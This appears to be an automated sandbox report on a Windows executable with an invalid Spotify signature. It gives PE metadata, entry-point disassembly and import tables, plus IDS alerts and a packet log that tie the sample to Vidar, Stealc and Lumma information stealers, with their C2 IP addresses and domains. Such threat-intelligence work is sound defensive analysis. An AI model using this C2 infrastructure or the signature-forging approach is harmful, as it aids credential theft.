                                                                                                                                                                                                                    Icon Hash:00928e8e8686b000
                                                                                                                                                                                                                    Entrypoint:0x406f72
                                                                                                                                                                                                                    Entrypoint Section:.text
                                                                                                                                                                                                                    Digitally signed:true
                                                                                                                                                                                                                    Imagebase:0x400000
                                                                                                                                                                                                                    Subsystem:windows gui
                                                                                                                                                                                                                    Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                                                                                                                                    DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                    Time Stamp:0x66FE9326 [Thu Oct 3 12:50:46 2024 UTC]
                                                                                                                                                                                                                    TLS Callbacks:
                                                                                                                                                                                                                    CLR (.Net) Version:
                                                                                                                                                                                                                    OS Version Major:6
                                                                                                                                                                                                                    OS Version Minor:0
                                                                                                                                                                                                                    File Version Major:6
                                                                                                                                                                                                                    File Version Minor:0
                                                                                                                                                                                                                    Subsystem Version Major:6
                                                                                                                                                                                                                    Subsystem Version Minor:0
                                                                                                                                                                                                                    Import Hash:1186293b831ff45d8016d71d51f87333
                                                                                                                                                                                                                    Signature Valid:false
                                                                                                                                                                                                                    Signature Issuer:CN=DigiCert Trusted G4 Code Signing RSA4096 SHA384 2021 CA1, O="DigiCert, Inc.", C=US
                                                                                                                                                                                                                    Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                    Error Number:-2146869232
                                                                                                                                                                                                                    Not Before, Not After
                                                                                                                                                                                                                    • 22/09/2022 02:00:00 20/10/2023 01:59:59
                                                                                                                                                                                                                    Subject Chain
                                                                                                                                                                                                                    • CN=Spotify AB, O=Spotify AB, L=Stockholm, C=SE, SERIALNUMBER=5567037485, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=SE
                                                                                                                                                                                                                    Version:3
                                                                                                                                                                                                                    Thumbprint MD5:EF8873EED657F2DFE432077ADBAB8AFB
                                                                                                                                                                                                                    Thumbprint SHA-1:3F76C6CC576963831FF44303BFCB98113C51C95E
                                                                                                                                                                                                                    Thumbprint SHA-256:890C79F427B0C07DEF096FF66A402E9337F0F2D80DACA1256A7F572F7720DBAA
                                                                                                                                                                                                                    Serial:04C530703A210EC1D6F83CB4FE1118C5
                                                                                                                                                                                                                    Instruction
                                                                                                                                                                                                                    call 00007FA7E4B47FAAh
                                                                                                                                                                                                                    jmp 00007FA7E4B4768Fh
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    mov eax, dword ptr [ebp+08h]
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    mov ecx, dword ptr [eax+3Ch]
                                                                                                                                                                                                                    add ecx, eax
                                                                                                                                                                                                                    movzx eax, word ptr [ecx+14h]
                                                                                                                                                                                                                    lea edx, dword ptr [ecx+18h]
                                                                                                                                                                                                                    add edx, eax
                                                                                                                                                                                                                    movzx eax, word ptr [ecx+06h]
                                                                                                                                                                                                                    imul esi, eax, 28h
                                                                                                                                                                                                                    add esi, edx
                                                                                                                                                                                                                    cmp edx, esi
                                                                                                                                                                                                                    je 00007FA7E4B4782Bh
                                                                                                                                                                                                                    mov ecx, dword ptr [ebp+0Ch]
                                                                                                                                                                                                                    cmp ecx, dword ptr [edx+0Ch]
                                                                                                                                                                                                                    jc 00007FA7E4B4781Ch
                                                                                                                                                                                                                    mov eax, dword ptr [edx+08h]
                                                                                                                                                                                                                    add eax, dword ptr [edx+0Ch]
                                                                                                                                                                                                                    cmp ecx, eax
                                                                                                                                                                                                                    jc 00007FA7E4B4781Eh
                                                                                                                                                                                                                    add edx, 28h
                                                                                                                                                                                                                    cmp edx, esi
                                                                                                                                                                                                                    jne 00007FA7E4B477FCh
                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    mov eax, edx
                                                                                                                                                                                                                    jmp 00007FA7E4B4780Bh
                                                                                                                                                                                                                    push esi
                                                                                                                                                                                                                    call 00007FA7E4B482B4h
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    je 00007FA7E4B47832h
                                                                                                                                                                                                                    mov eax, dword ptr fs:[00000018h]
                                                                                                                                                                                                                    mov esi, 004898C0h
                                                                                                                                                                                                                    mov edx, dword ptr [eax+04h]
                                                                                                                                                                                                                    jmp 00007FA7E4B47816h
                                                                                                                                                                                                                    cmp edx, eax
                                                                                                                                                                                                                    je 00007FA7E4B47822h
                                                                                                                                                                                                                    xor eax, eax
                                                                                                                                                                                                                    mov ecx, edx
                                                                                                                                                                                                                    lock cmpxchg dword ptr [esi], ecx
                                                                                                                                                                                                                    test eax, eax
                                                                                                                                                                                                                    jne 00007FA7E4B47802h
                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                    pop esi
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    int3
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    cmp dword ptr [ebp+08h], 00000000h
                                                                                                                                                                                                                    jne 00007FA7E4B47819h
                                                                                                                                                                                                                    mov byte ptr [004898C4h], 00000001h
                                                                                                                                                                                                                    call 00007FA7E4B47AD7h
                                                                                                                                                                                                                    call 00007FA7E4B4A844h
                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                    jne 00007FA7E4B47816h
                                                                                                                                                                                                                    xor al, al
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    call 00007FA7E4B51395h
                                                                                                                                                                                                                    test al, al
                                                                                                                                                                                                                    jne 00007FA7E4B4781Ch
                                                                                                                                                                                                                    push 00000000h
                                                                                                                                                                                                                    call 00007FA7E4B4A84Bh
                                                                                                                                                                                                                    pop ecx
                                                                                                                                                                                                                    jmp 00007FA7E4B477FBh
                                                                                                                                                                                                                    mov al, 01h
                                                                                                                                                                                                                    pop ebp
                                                                                                                                                                                                                    ret
                                                                                                                                                                                                                    push ebp
                                                                                                                                                                                                                    mov ebp, esp
                                                                                                                                                                                                                    cmp byte ptr [004898C5h], 00000000h
                                                                                                                                                                                                                    je 00007FA7E4B47816h

| Name | Virtual Address | Virtual Size | Is in Section |
|---|---|---|---|
| IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IMPORT | 0x26d30 | 0x3c | .rdata |
| IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8b000 | 0x1e0 | .rsrc |
| IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_SECURITY | 0x89600 | 0x2978 | |
| IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x8c000 | 0x1aec | .reloc |
| IMAGE_DIRECTORY_ENTRY_DEBUG | 0x25078 | 0x1c | .rdata |
| IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x24fb8 | 0x40 | .rdata |
| IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_IAT | 0x1e000 | 0x134 | .rdata |
| IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
| IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 | |

| Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
|---|---|---|---|---|---|---|---|---|---|
| .text | 0x1000 | 0x1c6cc | 0x1c800 | 5d01ce9daed9f6709f9e991a74cf1582 | False | 0.5815686677631579 | data | 6.639339648919584 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ |
| .rdata | 0x1e000 | 0x9424 | 0x9600 | 9a6b58223837662d548d3440ddb18c78 | False | 0.38614583333333335 | data | 4.652775533496149 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .data | 0x28000 | 0x624d0 | 0x61600 | bda977ba809dd7ca887a6ddabde07e45 | False | 0.9919468068035944 | DOS executable (block device driver \377\377\377\377) | 7.994010542069725 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE |
| .rsrc | 0x8b000 | 0x1e0 | 0x200 | f5eac9bb7a5931fe3c044829d9bd33dd | False | 0.53125 | data | 4.7176788329467545 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
| .reloc | 0x8c000 | 0x1aec | 0x1c00 | 6d5dd1e28cfe7ce900c92cc7ddef11f5 | False | 0.7346540178571429 | data | 6.441550202622086 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |

| Name | RVA | Size | Type | Language | Country | ZLIB Complexity |
|---|---|---|---|---|---|---|
| RT_MANIFEST | 0x8b060 | 0x17d | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.5931758530183727 |

| DLL | Import |
|---|---|
| USER32.dll | SetCursorPos |
| KERNEL32.dll | GetProcAddress, CreateFileW, CloseHandle, GetConsoleWindow, MultiByteToWideChar, GetStringTypeW, WideCharToMultiByte, EnterCriticalSection, LeaveCriticalSection, InitializeCriticalSectionEx, DeleteCriticalSection, EncodePointer, DecodePointer, LCMapStringEx, GetCPInfo, IsProcessorFeaturePresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetCurrentProcess, TerminateProcess, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, GetStartupInfoW, GetModuleHandleW, HeapSize, RaiseException, RtlUnwind, GetLastError, SetLastError, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, FreeLibrary, WriteConsoleW, LoadLibraryExW, GetStdHandle, WriteFile, GetModuleFileNameW, ExitProcess, GetModuleHandleExW, HeapFree, LCMapStringW, GetLocaleInfoW, IsValidLocale, GetUserDefaultLCID, EnumSystemLocalesW, HeapAlloc, GetFileType, FlushFileBuffers, GetConsoleOutputCP, GetConsoleMode, ReadFile, GetFileSizeEx, SetFilePointerEx, ReadConsoleW, HeapReAlloc, FindClose, FindFirstFileExW, FindNextFileW, IsValidCodePage, GetACP, GetOEMCP, GetCommandLineA, GetCommandLineW, GetEnvironmentStringsW, FreeEnvironmentStringsW, SetStdHandle, GetProcessHeap |

| Language of compilation system | Country where language is spoken |
|---|---|
| English | United States |

| Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol |
|---|---|---|---|---|---|---|---|---|
| 2024-10-03T15:14:36.299028+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49713 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:37.689850+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49714 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:39.062524+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 49715 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:40.417792+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56237 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:41.119683+0200 | 2049087 | ET MALWARE Win32/Stealc/Vidar Stealer Style Headers In HTTP POST | 1 | 192.168.2.8 | 56237 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:41.119899+0200 | 2044247 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config | 1 | 49.12.197.9 | 443 | 192.168.2.8 | 56237 | TCP |
| 2024-10-03T15:14:41.775560+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56238 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:42.473975+0200 | 2051831 | ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config M1 | 1 | 49.12.197.9 | 443 | 192.168.2.8 | 56238 | TCP |
| 2024-10-03T15:14:43.192813+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56239 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:44.196910+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56240 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:47.406735+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56241 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:48.495165+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56242 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:49.627817+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56244 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:50.758435+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56245 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:52.456117+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56247 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:54.320488+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56249 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:55.857897+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56250 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:57.290766+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56251 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:14:58.538988+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56252 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:01.488986+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56253 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:02.867487+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56254 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:04.205708+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56255 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:05.605832+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56256 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:07.639807+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56257 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:09.807815+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56258 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:15.774920+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.2.8 | 56259 | 147.45.44.104 | 80 | TCP |
| 2024-10-03T15:15:18.018253+0200 | 2056408 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (soldiefieop .site) | 1 | 192.168.2.8 | 52448 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.029568+0200 | 2056402 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (questionsmw .store) | 1 | 192.168.2.8 | 54212 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.058566+0200 | 2056392 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abnomalrkmu .site) | 1 | 192.168.2.8 | 54546 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.069567+0200 | 2056396 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (chorusarorp .site) | 1 | 192.168.2.8 | 63060 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.080581+0200 | 2056410 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (treatynreit .site) | 1 | 192.168.2.8 | 59551 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.101598+0200 | 2056406 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (snarlypagowo .site) | 1 | 192.168.2.8 | 61121 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.113568+0200 | 2056400 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (mysterisop .site) | 1 | 192.168.2.8 | 55865 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.125505+0200 | 2056394 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (absorptioniw .site) | 1 | 192.168.2.8 | 50732 | 1.1.1.1 | 53 | UDP |
| 2024-10-03T15:15:18.459716+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56262 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:20.848335+0200 | 2028765 | ET JA3 Hash - [Abuse.ch] Possible Dridex | 3 | 192.168.2.8 | 56265 | 49.12.197.9 | 443 | TCP |
| 2024-10-03T15:15:21.246548+0200 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.8 | 56266 | 172.67.166.76 | 443 | TCP |
| 2024-10-03T15:15:21.246548+0200 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.8 | 56266 | 172.67.166.76 | 443 | TCP |
| 2024-10-03T15:15:22.702271+0200 | 2054495 | ET MALWARE Vidar Stealer Form Exfil | 1 | 192.168.2.8 | 56268 | 45.132.206.251 | 80 | TCP |

| Timestamp | Source Port | Dest Port | Source IP | Dest IP |
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273756981 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273786068 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273839951 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273852110 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273888111 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.273904085 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287338018 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287465096 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287468910 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.287512064 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.291059971 CEST49712443192.168.2.8104.102.49.254
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.291073084 CEST44349712104.102.49.254192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405107975 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405164957 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.405529022 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.408946037 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:35.408962011 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.298089981 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.299027920 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.301775932 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.301786900 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302120924 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302247047 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.302568913 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.347408056 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791305065 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791426897 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.791522980 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.794213057 CEST49713443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.794234037 CEST4434971349.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796286106 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796314001 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796392918 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796597004 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:36.796612024 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.689779043 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.689850092 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.690916061 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.690931082 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.692455053 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:37.692461014 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399341106 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399414062 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399441004 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399466038 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399518967 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399518967 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399651051 CEST49714443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.399667978 CEST4434971449.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401165009 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401210070 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401282072 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401628017 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:38.401644945 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.062414885 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.062524080 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.063215017 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.063222885 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.064940929 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.064948082 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.124916077 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129707098 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129803896 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.129868984 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.134579897 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.592917919 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.593523979 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.599144936 CEST5356235162.159.36.2192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.599251032 CEST5623553192.168.2.8162.159.36.2
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741636992 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741691113 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741836071 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741843939 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.741916895 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.742168903 CEST49715443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.742187977 CEST4434971549.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745184898 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745238066 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.745321989 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.746216059 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:39.746228933 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.417655945 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.417792082 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.418273926 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.418281078 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.420958042 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:40.420963049 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119632006 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119673014 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119693041 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119709969 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119735956 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119752884 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119760036 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.119796991 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.120167971 CEST56237443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.120188951 CEST4435623749.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.121923923 CEST56238443192.168.2.849.12.197.9
                                                                                                                                                                                                                    Oct 3, 2024 15:14:41.121958017 CEST4435623849.12.197.9192.168.2.8
                                                                                                                                                                                                                    Oct 3, 2024 15:14:44.970758915 CEST4435624049.12.197.9192.168.2.8
